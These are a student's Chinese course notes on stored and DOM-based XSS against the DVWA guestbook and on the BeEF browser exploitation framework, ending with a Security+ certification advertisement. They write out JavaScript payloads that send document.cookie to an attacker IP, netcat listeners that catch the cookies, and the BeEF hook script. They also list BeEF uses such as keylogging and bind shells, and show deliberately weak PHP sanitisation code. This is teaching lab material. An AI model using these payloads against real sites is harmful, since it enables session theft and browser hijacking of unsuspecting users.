【安全牛学员笔记】存储型XSS和BEEF浏览器攻击框架

来源:互联网 发布:梨园淘宝城贵吗 编辑:程序博客网 时间:2024/06/05 18:35

存储型XSS                                                             

    长期存储于服务器端                                                

    每次用于访问都会被执行javascript脚本                              

Name:客户端表单长度限制                                               

    客户端、截断代理                                                  

<script src=http://1.1.1.1/a.js></script>                             

a.js源码                                                              

    var img = new Image();                                            

    img.src = "http://1.1.1.1:88/cookies.php?cookie="+documnet.cookie;

root@R:~# netstat -pantu | grep 80

tcp        0      0 127.0.0.1:80            0.0.0.0:*         LISTEN       771/gsad

tcp        0      0 192.168.1.102:34212     140.98.195.27.80  ESTABLISHED  2840/wget

tcp6       0      127.0.0.1:8080            :::*              LISTEN       2387/java

root@R:~# kill 771

root@R:~# service apache2 start

root@R:~# cd /var/www/html/

root@R:/var/www/html# gedit a.js

var img = new Image();

img.src = "http://192.168.1.102:88/cookies.php?cookie="+documnet.cookie;

root@R:~# nc -nlvp 88

----------------------------------------------------------------------

低安全代码

<?php

if(isset($_POST['btnSign']))

{

    $message = trim($_POST['mixMessage']);

    $name    = trim($_POST['txtName]);

    // Sanitize message input

    $message = stripslashes($message);

    $message = mysql_real_escape_string($message);

    // Sanitize name input

    $name = mysql_real_escape_string($name);

    $query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";

    $result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>' );

}

?>

---------------------------------------------------------------------------

中安全代码

<?php

if(isset($_POST['btnSign']))

{

    $message = trim($_POST['mixMessage']);

    $name    = trim($_POST['txtName]);

    // Sanitize message input

    $message = trim(strip_tags(addslashed($message)));

    $message = mysql_real_escape_string($message);

    $message = htmlspecialchars($message);

    // Sanitize name input

    $name = str_replace('<script>','',$name);

    $name = mysql_real_escape_string($name);

    $query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";

    $result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>' );

}

?>

----------------------------------------------------------------------------------

高安全代码

<?php

if(isset($_POST['btnSign']))

{

    $message = trim($_POST['mixMessage']);

    $name    = trim($_POST['txtName]);

    // Sanitize message input

    $message = stripslashes($message);

    $message = mysql_real_escape_string($message);

    $message = htmlspecialchars($message);

    // Sanitize name input

    $name = str_replace('<script>','',$name);

    $name = mysql_real_escape_string($name);

    $name = htmlspecialchars($name);

    $query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";

    $result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>' );

}

?>

----------------------------------------------------------------------------------

XSS                                                 

DOM型XSS                                           

    一套JS和其他语言可调用的标准的API              

Page                 Document objedct               

Element1             Obj1                           

Element2             Obj2  ┌Properties─Value┬Get 

                           │                 └Set 

Element3             Obj3─┼Methods─Action┬Add   

                           │               └Del   

                           └Event               

XSS                                                                       

DOM型XSS                                                                  

    <script>var                                                           

    img=document.createElememt("img");img.src="http://192.168.1.102:88/log

    ?"+escape(document.cookie);</script>

root@R:~# vi 1

<script>var img=document.createElememt("img");img.src="http://192.168.1.102:88/log?"+escape(document.cookie);</script>

root@R:~# nc -nlvp 88

BEEF                                                

浏览器攻击面                                        

    应用普遍转移到B/S架构,浏览器成为统一客户端程序 

    结合社会工程学方法对浏览器进行攻击              

    攻击浏览器用户                                  

    通过注入的JS脚本,利用浏览器攻击其他网站       

Beff(Brower exploitation framework)                 

    生成、交付palyload                              

    Ruby语言编写                                    

    服务器端:管理hooked客户端                      

    客户端:运行与客户端浏览器的Javascript脚本(hook)

BEEF                                

攻击手段                            

    利用网站xss漏洞实现攻击         

    诱使客户端访问含有hook的伪造站点

    结合中介人攻击注入hook脚本      

常见用途                            

    键盘记录器                      

    网盘扫描                        

    浏览器信息收集                

    绑定shell                       

    与metasploit集成

BEEF                                                                                          

演示页面:http://<IP_BeEF_Server>:3000/demos/basic.html        

Details:                                                        

    浏览器、插件版本信息;操作系统信息                         

Logs:                                                           

    浏览器工作:焦点变化、鼠标点击、信息输入                    

Commands:命令模块                                              

    绿色模块:表示模块适合目标浏览器,并且执行结果被客户端不可见

    红色模块:表示模块不适用于当前用户,有些红色模块也可正常执行

    橙色模块:模块可用,但结果对用户可见(CAM弹窗申请权限等)   

    灰色模块:模块末在目标浏览器上测试过      

beef xss framework

[*] Please wait as BeEF services are started.

[*] You might need to refresh your browser once it opens.

[*] UI URL: http://127.0.0.1:3000/ui/panel

[*] Hook: <script src="http://<IP>:3000/hook.js"></script>

[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>

192.168.1.102:3000/hook.js

BEEF            

主要模块        

    Browsers    

    Exploits    

    Host        

    Persistence 

    Network

该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂


Security+认证为什么是互联网+时代最火爆的认证?

      牛妹先给大家介绍一下Security+


        Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。

       通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易,含金量较高,目前已被全球企业和安全专业人士所普遍采纳。

Security+认证如此火爆的原因?  

       原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白 。

      目前行业内受认可的信息安全认证主要有CISP和CISSP,但是无论CISP还是CISSP都是偏重信息安全管理的,技术知识讲的宽泛且浅显,考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上,CISP也要求大专学历4年以上工作经验,这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中,无论是找工作还是升职加薪,或是投标时候报人员,认证都是必不可少的,这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍,由于Security+偏重信息安全技术,所以对工作经验没有特别的要求。只要你有IT相关背景,追求进步就可以学习和考试。

       原因二: IT运维人员工作与翻身的利器。

       在银行、证券、保险、信息通讯等行业,IT运维人员非常多,IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍,死亦写代码”的悲壮,但也有着“锄禾日当午,不如运维苦“的感慨。天天对着电脑和机器,时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识,掌握网络安全实践。职业发展朝着网络安全的方向发展,解决国内信息安全人才的匮乏问题。另外,即使不转型,要做好运维工作,学习安全知识取得安全认证也是必不可少的。

        原因三:接地气、国际范儿、考试方便、费用适中!

CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。

        在目前的信息安全大潮之下,人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的,相信Security+认证一定会成为最火爆的信息安全认证。

阅读全文
0 0
原创粉丝点击